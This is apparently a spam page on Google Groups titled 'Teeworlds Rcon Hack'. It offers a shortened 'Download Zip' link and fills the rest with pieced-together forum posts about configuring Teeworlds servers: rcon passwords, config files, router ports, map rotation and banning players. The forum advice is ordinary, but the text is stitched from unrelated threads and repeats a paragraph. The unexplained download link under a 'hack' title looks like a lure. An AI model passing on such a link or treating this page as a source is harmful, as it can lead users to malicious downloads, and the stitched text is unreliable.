Teeworlds Rcon Hack

0 views
Skip to first unread message
Message has been deleted

Hien Mondesir

unread,
Jul 14, 2024, 1:16:20 AM7/14/24
to unulagdon

Your problem, Tokoloshi, is that your teeworlds_srv don't load the config file. Under command line, you must run the server like this: teeworlds_srv -f server_config.cfg.
You can automate this procedure using a link with parameters or a bat file. Or, simply, renaming "server_config.cfg" into "autoexec.cfg"

teeworlds rcon hack


Download Zip https://urlca.com/2yMGK2



This problem has been posted and answered thousand of times.
The problem is in the router/firewall configuration. Teeworlds needs USP port 8303 opened and routed to your PC (internal pc address).
So, check your router configuration, disable all firewalls or add a rule for the game server (also firewall software like Windows or Zone Labs).

It has too be a server with an rcon password and you need too have that password written in settings. Then its just to press F2 (unless you changed the controls too something else) and write the commands. Most rcon commands changes one variable or another, like what map is used on the server or which gametype.

All the information you ask for is in the Docs files, allthough it isnt very pedagogically explained. To be completely honest with you, I had some trouble with it myself when I decided to try rcon out.

Since Im pretty good at explaining things, I thought Id give a shot at improving it. What comes next in this post is basicly a copy of the Docs file on rcon, but rewritten to be easier to understand (devs, feel free to copy this if you like it).

To be able to remote control your server, follow these steps:
1. Set rcon_password in your server config and start the server
(see the "Setting up a Server" document for details)
2. Set the same password in the client, available under settings, network in the game gui.
3. Join the server as a player

id is a number. To ba able to see the id of all players, set cl_show_player_ids=1 in the teewars config file of your client. In Windows, you can find this config file by doubleclicking on config_directory.bat in the directory you have Teewars. Its called default.cfg. With that variable set you will see every players id to the left of their name on the scoreboard (when you press tab ingame).

sv_map_reload=1
Reloads the current map. Use this when you want the same map but another gamemode. Changing the gamemode variable wont trigger a game restart, and thus it only takes effect after changing map or using this command.

Shootme: You are wrong. cl_show_player_ids=1 is not an rcon command. I also thought it was first but when I tried typing it it didnt work. No, it is as I already explained in my rewrite of the doc above, one of the variables in the file called default.cfg in the config directory. If you use windows Id suggest opening that file with notepad to change the variable.

you should find each command you need.
to use a command, create a file with the name "autoexec".cfg in your Appdata - folder (simply doubleclick "config_directory".bat in your teeworlds-folder, and write the command you like to change in it.
if you set a rcon_password you can change the server settings with the rcon ingame too.

guys i have same problem as amir had. I cant solve it though , even after reading the advice given by people. Plz help. I dont have a file called app data. It only came with a file called data. And is it possible to add a patch to my LAN server

ok guys , i got windows 7, i followed
C:\Users\Name\AppData\Roaming\Teeworlds
however i couldnt find the appdata so i tried to do it manually as suggested through writing cmd in the search. This still didnt work. Slayer GV u talk about a config bat file.
When i open this file it comes up with folders then 2 files called masters and settings. The folders are demos downloadedmaps dumps maps and screenshots.

ok guys , i got windows 7, i followed
C:\Users\Name\AppData\Roaming\Teeworlds
however i couldnt find the appdata so i tried to do it manually as suggested through writing cmd in the search. This still didnt work. Slayer GV u talk about a config bat file.
When i open this file it comes up with folders then 2 files called masters and settings. The folders are demos downloadedmaps dumps maps and screenshots.

You may take a look here: [HELP] How to install patches?. However, make sure your patch is written for Teeworlds 0.6, otherwise you'd have to use an older Version!
Btw: This topic is about Changing the map on a server, not about using patches

NEED HELP for my server: I created my own DDrace on DDraceBetaConverter (Client) I have starte - Tees and tart and the end for the DDrace. I made all what to do. I think the Client work but i dont know why my server crash (Teeworlds too) by the last KiB (414 / 141 = crash teeworlds stops beating -.-)

Last time I have problems with few players - they are kicking me from the server. I'm not able even to kick them (too small amount of time) - how to login as admin when I know admin password and being banned for 5 minutes to the server?
Or is there any possibility to kick people using server console (NOT rcon)?

some servers like city include special ranks that they can not kick for example your a account.
The easiest way is to bind the rcon password.and come online with an other name.then you bind the admin command yote no and you can be faster than the others.
I think rcon pw was something like : bind x rcon_auth 12345
and the other was:
bind y rcon vote no/yes
then i would kick or ban the whole server.some servers or all have the command: ban_all
greets jxsl13

so now we know that they use the multiclient, when you ban one, each one that has the same ip should be banned too,but when the target uses an ip changer you will be unable to ban him because he will try to come back as soon as possible.
At the moment the only mod that can protect the admin from multiclient is the ddrace because there you can set how many people with the same ip can connect to the server
i do not know if a patch with that function exists
try to look it up on
@kott : too easy to come to think of it.

guy, i posted the link bebause i did not know that the trunk has fixed it.and bebause ddrace was the first mod with that function i posted a link there.and i also did not know bebause i am not sitting the whole day in front of github and reading the comnents.
And now please stop posting off topic things

There is still no reason to redirect to that ddrace forum about an issue that concerns every Teeworlds server. This issue should be solved here, the official Teeworlds community is the good place to ask. DDRace isn't Teeworlds+.

Okay. the last time i hosted a server, i got "whatever map not loading" or something like that and it dumped me with a dm1 server with DM gameplay. I read some other topics and made progress into making a server but now, i cant get my server to say "Franchans server" as the title and I still cant make it to load the ctf5 map [For testing].

Yes, name it autoexec.cfg and put it in the same folder as the server executable, OR specify the name in the Terminal (i.e.: /User/Desktop/teewords/teeworlds_srv -f franchan.cfg). I just use the autoexec method; just run the server and it happens.

Later, you can call up the map rotation and change it with the console once you're online. Connect to your server in-game, hit F2 and type your password. Then, type sv_maprotation to see the maps and then again type sv_maprotation ctf1 ctf2, etc. Finally, type in sv_maprotation again to make sure it took. You can change other settings to.

The command list is on this website. Go to the main Teeworlds.com page, Go to the Support tab and select Documentation. In the Server section is all the information you'll need, unless you're using a mod. In that case, many have added commands.

My only guess at this point is the first two lines of both of your config files may be confusing the server. The "Setting value, setting2 value2" is part of the template telling you how to set variables. It didn't make any sense to me either.

Do you really have Teeworlds installed to /Users/Franchan/Library/Application Support/Teeworlds? I don't use the server launcher, just the executable, myself, so I don't know how or where it looks. It seems it may be looking in the wrong spot for the config file...

so then i took one of the older suggestions in my deleted topic and copied the maps in the teeworlds.app [the actual game] and put it in the franchan/library/application support/teeworlds/maps and tried again.
nothing.

However, there are downsides to hosting a LAN server. They do require specific steps to allow friends to join, and often have unstable connections compared to official servers. Also note that LAN servers will only save ranks locally - if you finish a map on a LAN server, your rank won't translate to any official servers.

However, this only allows players on your local network to join. In other words - nobody else except you can join this LAN server online. To allow players to join online, you'll have to go through more steps.

b1e95dc632
Reply all
Reply to author
Forward
0 new messages